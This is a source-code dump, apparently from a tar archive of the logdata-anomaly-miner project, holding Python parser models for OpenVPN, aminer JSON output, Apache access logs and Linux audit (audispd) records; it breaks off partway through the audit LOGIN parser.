FixedDataModelElement("colon", b": "), IpAddressDataModelElement("ip2") ]), ]) ]), SequenceModelElement("activity", [ FixedDataModelElement("open_bracket", b" ["), DelimitedDataModelElement("name", b"]"), FixedDataModelElement("close_bracket", b"] "), FirstMatchModelElement("fm", [ FixedDataModelElement("inactivity_timeout", b"Inactivity timeout (--ping-restart), restarting"), SequenceModelElement("peer_conn_initiated", [ FixedDataModelElement("peer_conn_initiated_str", b"Peer Connection Initiated with [AF_INET]"), IpAddressDataModelElement("ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("port") ]), ]) ]), SequenceModelElement("sent_control", [ FixedDataModelElement("sent_control_str", b" SENT CONTROL ["), DelimitedDataModelElement("name", b"]"), FixedDataModelElement("bracket", b"]: "), AnyByteDataModelElement("msg") ]), FixedDataModelElement("client_auth_expected", b" ++ Certificate has EKU (str) TLS Web Client Authentication, expects TLS Web Client Authentication"), FixedDataModelElement("push", b" PUSH: Received control message: 'PUSH_REQUEST'"), FixedDataModelElement("SIGUSR1", b" SIGUSR1[soft,ping-restart] received, client-instance restarting") ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/000077500000000000000000000000001437606560100265015ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/AminerParsingModel.py000066400000000000000000000244551437606560100326050ustar00rootroot00000000000000"""This module defines a parser for the aminer.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.JsonModelElement import JsonModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return the model.""" name_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" alphabet = "!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[] °§ß–\n".encode() alphabet_with_newline = alphabet + b"\n" filename_alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 ._-/" path = VariableByteDataModelElement("path", filename_alphabet) apostrophe = FixedDataModelElement("apostrophe", b"'") repeated_path = RepeatedElementDataModelElement("repeated", SequenceModelElement("sequence", [ apostrophe, path, apostrophe, OptionalMatchModelElement("optional", FixedDataModelElement("comma", b",")) ])) rule = SequenceModelElement("rule", [ FixedDataModelElement("open_bracket", b"("), repeated_path, FixedWordlistDataModelElement("close_bracket", [b")->(", b")<-("]), repeated_path, FixedDataModelElement("close_bracket", b")") ]) expected = SequenceModelElement("expected", [ DecimalIntegerValueModelElement("actual"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("expected") ]) observed = SequenceModelElement("observed", [ DecimalIntegerValueModelElement("actual"), FixedDataModelElement("slash", b"/"), DecimalIntegerValueModelElement("expected") ]) has_outlier_bins_flag = FixedWordlistDataModelElement("has_outlier_bins_flag", [b"true", b"false"]) model = JsonModelElement("aminer", { "_AnalysisComponent": { "AnalysisComponentIdentifier": FirstMatchModelElement("first", [ DecimalIntegerValueModelElement("component_id"), FixedDataModelElement("null", b"null") ]), "AnalysisComponentType": VariableByteDataModelElement("component_type", name_alphabet), "AnalysisComponentName": VariableByteDataModelElement("component_name", alphabet), "Message": VariableByteDataModelElement("message", alphabet), "_PersistenceFileName": VariableByteDataModelElement("persistence_file_name", filename_alphabet), "_TrainingMode": FixedWordlistDataModelElement("training_mode", [b"true", b"false"]), "_AffectedLogAtomPaths": [VariableByteDataModelElement("affected_log_atom_paths", alphabet)], "_AffectedLogAtomValues": [VariableByteDataModelElement("affected_log_atom_value", alphabet)], "_Metadata": { "TimeFirstOccurrence": DecimalFloatValueModelElement("time_first_occurrence"), "TimeLastOccurrence": DecimalFloatValueModelElement("time_last_occurrence"), "NumberOfOccurrences": DecimalIntegerValueModelElement("number_of_occurrences") }, "_ParsedLogAtom": {"ALLOW_ALL_KEYS": VariableByteDataModelElement("allow_all_keys", alphabet)}, "_FeatureList": [{ "Rule": { "type": VariableByteDataModelElement("type", name_alphabet), "path": path, "_value": VariableByteDataModelElement("value", alphabet), "match_action": VariableByteDataModelElement("match_action", filename_alphabet), "log_total": DecimalIntegerValueModelElement("log_total"), "log_success": DecimalIntegerValueModelElement("log_success") }, "Index": DecimalIntegerValueModelElement("index"), "CreationTime": DecimalFloatValueModelElement("creation_time"), "LastTriggerTime": DecimalFloatValueModelElement("last_trigger_time"), "TriggerCount": DecimalIntegerValueModelElement("trigger_count") }], "_AnalysisStatus": VariableByteDataModelElement("analysis_status", alphabet), "_TotalRecords": DecimalIntegerValueModelElement("total_records"), "_HistogramData": [{ "TotalElements": DecimalIntegerValueModelElement("total_elements"), "BinnedElements": DecimalIntegerValueModelElement("binned_elements"), "HasOutlierBinsFlag": has_outlier_bins_flag, "Bins": {"ALLOW_ALL_KEYS": DecimalIntegerValueModelElement("bin")}, "BinDefinition": { "Type": FixedWordlistDataModelElement("type", [b"ModuloTimeBinDefinition", b"LinearNumericBinDefinition"]), "LowerLimit": DecimalIntegerValueModelElement("lower_limit"), "BinSize": DecimalIntegerValueModelElement("bin_size"), "BinCount": DecimalIntegerValueModelElement("bin_count"), "OutlierBinsFlag": has_outlier_bins_flag, "BinNames": [ SequenceModelElement("bin_names", [ FirstMatchModelElement("first", [ SequenceModelElement("lower", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("value") ]), FixedDataModelElement("dots", b"...") ]), FixedDataModelElement("hyphen", b"-"), FirstMatchModelElement("first", [ SequenceModelElement("upper", [ DecimalIntegerValueModelElement("value"), FixedDataModelElement("close_bracket", b"]") ]), FixedDataModelElement("dots", b"...") ]), ]) ], "ExpectedBinRatio": DecimalFloatValueModelElement("expected_bin_ratio"), "_ModuloValue": DecimalIntegerValueModelElement("modulo_value"), "_TimeUnit": DecimalIntegerValueModelElement("time_unit") }, "PropertyPath": VariableByteDataModelElement("property_path", filename_alphabet), }], "_ReportInterval": DecimalIntegerValueModelElement("report_interval"), "_ResetAfterReportFlag": FixedWordlistDataModelElement("reset_after_report_flag", [b"true", b"false"]), "_MissingPaths": [VariableByteDataModelElement("missing_paths", alphabet)], "_AnomalyScores": [{ "Path": path, "AnalysisData": { "New": { "N": DecimalIntegerValueModelElement("n"), "Avg": DecimalFloatValueModelElement("avg"), "Var": DecimalFloatValueModelElement("var") }, "Old": { "N": DecimalIntegerValueModelElement("n"), "Avg": DecimalFloatValueModelElement("avg"), "Var": DecimalFloatValueModelElement("var") } } }], "_MinBinElements": DecimalIntegerValueModelElement("min_bin_elements"), "_MinBinTime": DecimalIntegerValueModelElement("min_bin_time"), "_DebugMode": FixedWordlistDataModelElement("debug_mode", [b"true", b"false"]), "_Rule": { "RuleId": VariableByteDataModelElement("id", filename_alphabet), "MinTimeDelta": DecimalIntegerValueModelElement("min_time_delta"), "MaxTimeDelta": DecimalIntegerValueModelElement("max_time_delta"), "ArtefactMatchParameters": [ path ], "HistoryAEvents": "EMPTY_ARRAY", "HistoryBEvents": "EMPTY_ARRAY", "LastTimestampSeen": DecimalFloatValueModelElement("last_timestamp_seen"), "correlation_history": { "MaxItems": DecimalIntegerValueModelElement("max_items"), "History": [ VariableByteDataModelElement("value", alphabet) ] } }, "_CheckResult": [VariableByteDataModelElement("value", alphabet_with_newline)], "_NewestTimestamp": DecimalFloatValueModelElement("newest_timestamp") }, "_TotalRecords": DecimalIntegerValueModelElement("total_records"), "_TypeInfo": "ALLOW_ALL", "_RuleInfo": { "Rule": rule, "Expected": expected, "Observed": observed }, "_LogData": { "RawLogData": [VariableByteDataModelElement("raw_log_data", alphabet)], "Timestamps": [DecimalFloatValueModelElement("timestamp")], "DetectionTimestamp": DecimalFloatValueModelElement("detection_timestamp"), "LogLinesCount": DecimalIntegerValueModelElement("lines_count"), "_AnnotatedMatchElement": VariableByteDataModelElement("annotated_match_element", alphabet_with_newline), }, "_StatusInfo": {"ALLOW_ALL_KEYS": { "CurrentProcessedLines": DecimalIntegerValueModelElement("current_processed_lines"), "TotalProcessedLines": DecimalIntegerValueModelElement("total_processed_lines") }}, "_FromTime": DecimalFloatValueModelElement("from_time"), "_ToTime": DecimalFloatValueModelElement("to_time"), "_DebugLog": [OptionalMatchModelElement("optional", VariableByteDataModelElement("debug_log", alphabet))] }, "_") return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/ApacheAccessModel.py000066400000000000000000000054541437606560100323470ustar00rootroot00000000000000from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement def get_model(): """Return a parser for apache2 access.log.""" alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-:" new_time_model = DateTimeModelElement("time", b"[%d/%b/%Y:%H:%M:%S%z") host_name_model = VariableByteDataModelElement("host", alphabet) identity_model = VariableByteDataModelElement("ident", alphabet) user_name_model = VariableByteDataModelElement("user", b"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz.-") request_method_model = FirstMatchModelElement("fm", [ FixedDataModelElement("dash", b"-"), SequenceModelElement("request", [ FixedWordlistDataModelElement("method", [ b"GET", b"POST", b"PUT", b"HEAD", b"DELETE", b"CONNECT", b"OPTIONS", b"TRACE", b"PATCH"]), FixedDataModelElement("sp5", b" "), DelimitedDataModelElement("request", b" ", b"\\"), FixedDataModelElement("sp6", b" "), DelimitedDataModelElement("version", b'"'), ]) ]) status_code_model = DecimalIntegerValueModelElement("status") size_model = DecimalIntegerValueModelElement("size") whitespace_str = b" " model = SequenceModelElement("accesslog", [ host_name_model, FixedDataModelElement("sp0", whitespace_str), identity_model, FixedDataModelElement("sp1", whitespace_str), user_name_model, FixedDataModelElement("sp2", whitespace_str), new_time_model, FixedDataModelElement("sp3", b'] "'), request_method_model, FixedDataModelElement("sp6", b'" '), status_code_model, FixedDataModelElement("sp7", whitespace_str), size_model, OptionalMatchModelElement( "combined", SequenceModelElement("combined", [ FixedDataModelElement("sp9", b' "'), DelimitedDataModelElement("referer", b'"', b"\\"), FixedDataModelElement("sp10", b'" "'), DelimitedDataModelElement("user_agent", b'"', b"\\"), FixedDataModelElement("sp11", b'"') ])) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/AudispdParsingModel.py000066400000000000000000001400151437606560100327520ustar00rootroot00000000000000"""This module contains functions and classes to create the parsing model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.ElementValueBranchModelElement import ElementValueBranchModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.MatchElement import MatchElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.WhiteSpaceLimitedDataModelElement import WhiteSpaceLimitedDataModelElement from aminer.parsing.ModelElementInterface import ModelElementInterface def get_model(): """Return a model to parse a audispd message logged via syslog after any standard logging preamble, e.g. from syslog.""" class ExecArgumentDataModelElement(ModelElementInterface): """This is a helper class for parsing the (encoded) exec argument strings found within audit logs.""" def get_match_element(self, target_path: str, match_context): """ Find the maximum number of bytes belonging to an exec argument. @return a match when at least two bytes were found including the delimiters. """ data = match_context.match_data match_len = 0 match_value = b"" if data[0] == ord(b'"'): match_len = data.find(b'"', 1) if match_len == -1: return None match_value = data[1:match_len] match_len += 1 elif data.startswith(b"(null)"): match_len = 6 match_value = None else: # Must be upper case hex encoded: next_value = -1 for d_byte in data: if 0x30 <= d_byte <= 0x39: d_byte -= 0x30 elif 0x41 <= d_byte <= 0x46: d_byte -= 0x37 else: break if next_value == -1: next_value = (d_byte << 4) else: match_value += bytearray(((next_value | d_byte),)) next_value = -1 match_len += 1 if next_value != -1: return None match_data = data[:match_len] match_context.update(match_data) return MatchElement(f"{target_path}/{self.element_id}", match_data, match_value, None) pam_status_word_list = FixedWordlistDataModelElement("status", [b"failed", b"success"]) pid = b" pid=" uid = b" uid=" auid = b" auid=" gid = b" gid=" ses = b" ses=" exe = b' exe="' hostname = b'" hostname=' hostname1 = b'" (hostname=' addr = b" addr=" addr1 = b", addr=" terminal = b" terminal=" terminal1 = b", terminal=" res = b" res=" exe1 = b'" exe="' subj = b" subj=" comm = b" comm=" reason = b" reason=" dev = b" dev=" sig = b" sig=" alphabet = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789._-" perms_alphabet = b"abcdefghijklmnopqrstuvwxyz," type_branches = { "ADD_GROUP": SequenceModelElement("addgroup", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", b" msg='op=adding group acct=\""), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", b'"'), FixedDataModelElement("s7", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s8", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s9", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s10", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s11", res), pam_status_word_list, FixedDataModelElement("s12", b"'"), ]), "ADD_USER": SequenceModelElement("adduser", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedWordlistDataModelElement("s5", [b" msg='op=adding user id=", b" msg='op=adding home directory id="]), DecimalIntegerValueModelElement("newuserid"), FixedDataModelElement("s6", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s8", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s9", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b"'"), ]), "ANOM_ABEND": SequenceModelElement("anom_abend", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s5", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s6", comm), ExecArgumentDataModelElement("command"), FixedDataModelElement("s7", reason), ExecArgumentDataModelElement("reason"), FixedDataModelElement("s8", sig), DecimalIntegerValueModelElement("sig") ]), "ANOM_ACCESS_FS": AnyByteDataModelElement("anom_access_fs"), "ANOM_ADD_ACCT": AnyByteDataModelElement("anom_add_acct"), "ANOM_AMTU_FAIL": AnyByteDataModelElement("anom_amtu_fail"), "ANOM_CRYPTO_FAIL": AnyByteDataModelElement("anom_crypto_fail"), "ANOM_DEL_ACCT": AnyByteDataModelElement("anom_del_acct"), "ANOM_EXEC": SequenceModelElement("anom_exec", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' acct="'), DelimitedDataModelElement("acct", b'"'), FixedDataModelElement("s6", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s7", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s8", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s9", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s10", res), pam_status_word_list, FixedDataModelElement("s11", b")'") ]), "ANOM_LOGIN_ACCT": AnyByteDataModelElement("anom_login_acct"), "ANOM_LOGIN_FAILURES": AnyByteDataModelElement("anom_login_failures"), "ANOM_LOGIN_LOCATION": AnyByteDataModelElement("anom_login_location"), "ANOM_LOGIN_SESSIONS": AnyByteDataModelElement("anom_login_sessions"), "ANOM_LOGIN_TIME": AnyByteDataModelElement("anom_login_time"), "ANOM_MAX_DAC": AnyByteDataModelElement("anom_max_dac"), "ANOM_MAX_MAC": AnyByteDataModelElement("anom_max_mac"), "ANOM_MK_EXEC": AnyByteDataModelElement("anom_mk_exec"), "ANOM_MOD_ACCT": AnyByteDataModelElement("anom_mod_acct"), "ANOM_PROMISCUOUS": SequenceModelElement("anom_promiscuous", [ FixedDataModelElement("s0", b" dev="), VariableByteDataModelElement("dev", alphabet), FixedDataModelElement("s1", b" prom="), DecimalIntegerValueModelElement("prom"), FixedDataModelElement("s2", b" old_prom="), DecimalIntegerValueModelElement("old_prom"), FixedDataModelElement("s3", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s5", gid), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("s6", ses), DecimalIntegerValueModelElement("ses"), ]), "ANOM_RBAC_FAIL": AnyByteDataModelElement("anom_rbac_fail"), "ANOM_RBAC_INTEGRITY_FAIL": AnyByteDataModelElement("anom_rbac_integrity_fail"), "ANOM_ROOT_TRANS": AnyByteDataModelElement("anom_root_trans"), "AVC": AnyByteDataModelElement("avc"), "AVC_PATH": AnyByteDataModelElement("avc_path"), "BPRM_FCAPS": SequenceModelElement("bprmfcaps", [ FixedDataModelElement("s0", b" fver="), DecimalIntegerValueModelElement("fver"), FixedDataModelElement("s1", b" fp="), HexStringModelElement("fp"), FixedDataModelElement("s2", b" fi="), HexStringModelElement("fi"), FixedDataModelElement("s3", b" fe="), HexStringModelElement("fe"), FixedDataModelElement("s4", b" old_pp="), DelimitedDataModelElement("pp-old", b" "), FixedDataModelElement("s5", b" old_pi="), DelimitedDataModelElement("pi-old", b' '), FixedDataModelElement("s6", b" old_pe="), DelimitedDataModelElement("pe-old", b" "), FixedDataModelElement("s7", b" new_pp="), DelimitedDataModelElement("pp-new", b" "), FixedDataModelElement("s8", b" new_pi="), DelimitedDataModelElement("pi-new", b" "), FixedDataModelElement("s9", b" new_pe="), AnyByteDataModelElement("pe-new") ]), "CAPSET": AnyByteDataModelElement("capset"), "CHGRP_ID": AnyByteDataModelElement("chgrp_id"), "CHUSER_ID": AnyByteDataModelElement("chuser_id"), "CONFIG_CHANGE": SequenceModelElement("conf-change", [ FixedDataModelElement("s0", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s1", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s2", b' op="'), DelimitedDataModelElement("op", b'"'), FixedDataModelElement("s3", b'" path="'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("s4", b'" key='), DelimitedDataModelElement("key", b" "), FixedDataModelElement("s5", b' list='), DecimalIntegerValueModelElement("list"), FixedDataModelElement("s6", res), DecimalIntegerValueModelElement("result") ]), "CRED_ACQ": SequenceModelElement("credacq", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_DISP": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="'), DelimitedDataModelElement("username", b'"'), FixedDataModelElement("s5", exe1), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s6", hostname), DelimitedDataModelElement("clientname", b" "), FixedDataModelElement("s7", addr), DelimitedDataModelElement("clientip", b" "), FixedDataModelElement("s8", terminal), WhiteSpaceLimitedDataModelElement("terminal"), FixedDataModelElement("s9", res), pam_status_word_list, FixedDataModelElement("s10", b"'"), ]), "CRED_REFR": SequenceModelElement("creddisp", [ FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s3", ses), DecimalIntegerValueModelElement("ses"), FixedDataModelElement("s4", b' msg=\'op=PAM:setcred acct="root" exe="/usr/sbin/sshd" hostname='), IpAddressDataModelElement("clientname"), FixedDataModelElement("s5", addr), IpAddressDataModelElement("clientip"), FixedDataModelElement("s6", terminal), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s7", res), pam_status_word_list, FixedDataModelElement("s8", b"'"), ]), "CRYPTO_FAILURE_USER": AnyByteDataModelElement("crypto_failure_user"), "CRYPTO_KEY_USER": AnyByteDataModelElement("crypto_key_user"), "CRYPTO_LOGIN": AnyByteDataModelElement("crypto_login"), "CRYPTO_LOGOUT": AnyByteDataModelElement("crypto_logout"), "CRYPTO_PARAM_CHANGE_USER": AnyByteDataModelElement("crypto_param_change_user"), "CRYPTO_REPLAY_USER": AnyByteDataModelElement("crypto_replay_user"), "CRYPTO_SESSION": SequenceModelElement("crypto_session", [ FixedDataModelElement("space", b" "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("s0", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", uid), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s2", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s4", b" msg='op="), DelimitedDataModelElement("msg", b" "), FixedDataModelElement("s5", b' direction='), DelimitedDataModelElement("direction", b' '), FixedDataModelElement("s6", b' cipher='), DelimitedDataModelElement("cipher", b' '), FixedDataModelElement("s7", b' ksize='), DecimalIntegerValueModelElement("ksize"), FixedDataModelElement("s8", b' rport='), DecimalIntegerValueModelElement("rport"), FixedDataModelElement("s9", b' laddr='), IpAddressDataModelElement("laddr"), FixedDataModelElement("s10", b' lport='), DecimalIntegerValueModelElement("lport"), FixedDataModelElement("s11", b' id='), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s12", exe), DelimitedDataModelElement("exec", b'"'), FixedDataModelElement("s13", hostname1), DelimitedDataModelElement("hostname", b","), FixedDataModelElement("s14", addr1), DelimitedDataModelElement("addr", b","), FixedDataModelElement("s15", terminal1), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s16", res), pam_status_word_list, FixedDataModelElement("s17", b")'") ]), "CRYPTO_TEST_USER": AnyByteDataModelElement("crypto_test_user"), "CWD": SequenceModelElement("cwd", [ FixedDataModelElement("s0", b" cwd="), ExecArgumentDataModelElement("cwd")]), "DAC_CHECK": AnyByteDataModelElement("dac_check"), "DAEMON_ABORT": SequenceModelElement("daemon_abort", [ FixedDataModelElement("s0", b" auditd error halt,"), FixedDataModelElement("s1", auid), DecimalIntegerValueModelElement("auid"), FixedDataModelElement("s2", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s3", res), pam_status_word_list ]), "DAEMON_ACCEPT": AnyByteDataModelElement("daemon_accept"), "DAEMON_CLOSE": AnyByteDataModelElement("daemon_close"), "DAEMON_CONFIG": SequenceModelElement("daemon_config", [ FixedDataModelElement("s0", b" auditd error getting hup info - no change, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_END": SequenceModelElement("daemon_end", [ FixedDataModelElement("s0", b" auditd normal halt, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), OptionalMatchModelElement("optional_subj", DelimitedDataModelElement("subj", b" ")), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_RESUME": SequenceModelElement("daemon_resume", [ FixedDataModelElement("s0", b" auditd resuming logging, sending"), FixedDataModelElement("s1", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s2", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s3", subj), DelimitedDataModelElement("subj", b" "), FixedDataModelElement("s4", res), pam_status_word_list ]), "DAEMON_ROTATE": AnyByteDataModelElement("daemon_rotate"), "DAEMON_START": SequenceModelElement("daemon_start", [ FixedDataModelElement("s0", b" auditd start, ver="), DecimalFloatValueModelElement("ver"), FixedDataModelElement("s1", b" format="), DelimitedDataModelElement("format", b" "), FixedDataModelElement("s2", b" kernel="), DelimitedDataModelElement("kernel", b" "), FixedDataModelElement("s3", auid), DelimitedDataModelElement("auid", b" "), FixedDataModelElement("s4", pid), DelimitedDataModelElement("pid", b" "), FixedDataModelElement("s5", res), pam_status_word_list ]), "DEL_GROUP": AnyByteDataModelElement("del_group"), "DEL_USER": AnyByteDataModelElement("del_user"), "EOE": AnyByteDataModelElement("eoe"), "EXECVE": SequenceModelElement("execve", [ FixedDataModelElement("s0", b" argc="), DecimalIntegerValueModelElement("argc"), # We need a type branch here also, but there is no additional data in EOE records after Ubuntu Trusty any more. RepeatedElementDataModelElement("arg", SequenceModelElement("execarg", [ FixedDataModelElement("s0", b" a"), DecimalIntegerValueModelElement("argn"), FixedDataModelElement("s1", b"="), ExecArgumentDataModelElement("argval") ])) ]), "FD_PAIR": SequenceModelElement("fdpair", [ FixedDataModelElement("s0", b" fd0="), DecimalIntegerValueModelElement("fd0"), FixedDataModelElement("s1", b" fd1="), DecimalIntegerValueModelElement("fd1") ]), "FS_RELABEL": AnyByteDataModelElement("fs_relabel"), "GRP_AUTH": AnyByteDataModelElement("grp_auth"), "INTEGRITY_DATA": AnyByteDataModelElement("integrity_data"), "INTEGRITY_HASH": AnyByteDataModelElement("integrity_hash"), "INTEGRITY_METADATA": AnyByteDataModelElement("integrity_metadata"), "INTEGRITY_PCR": AnyByteDataModelElement("integrity_pcr"), "INTEGRITY_RULE": AnyByteDataModelElement("integrity_rule"), "INTEGRITY_STATUS": AnyByteDataModelElement("integrity_status"), "IPC": AnyByteDataModelElement("ipc"), "IPC_SET_PERM": AnyByteDataModelElement("ipc_set_perm"), "KERNEL": AnyByteDataModelElement("kernel"), "KERNEL_OTHER": AnyByteDataModelElement("kernel_other"), "LABEL_LEVEL_CHANGE": AnyByteDataModelElement("label_level_change"), "LABEL_OVERRIDE": AnyByteDataModelElement("label_override"), # This message differs on Ubuntu 32/64 bit variants. "LOGIN": SequenceModelElement("login", [ FixedDataModelElement("s0", b" login"), FixedDataModelElement("s1", pid), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s2", uid), DecimalIntegerValueModelElement("uid"), FixedWordlistDataModelElement("s3", [b" old auid=", b" old-auid="]), DecimalIntegerValueModelElement("auid-old"), FixedWordlistDataModelElement("s4", [b" new auid=", auid]), DecimalIntegerValueModelElement("auid-new"), FixedWordlistDataModelElement("s5", [b" old ses=", b" old-ses="]), 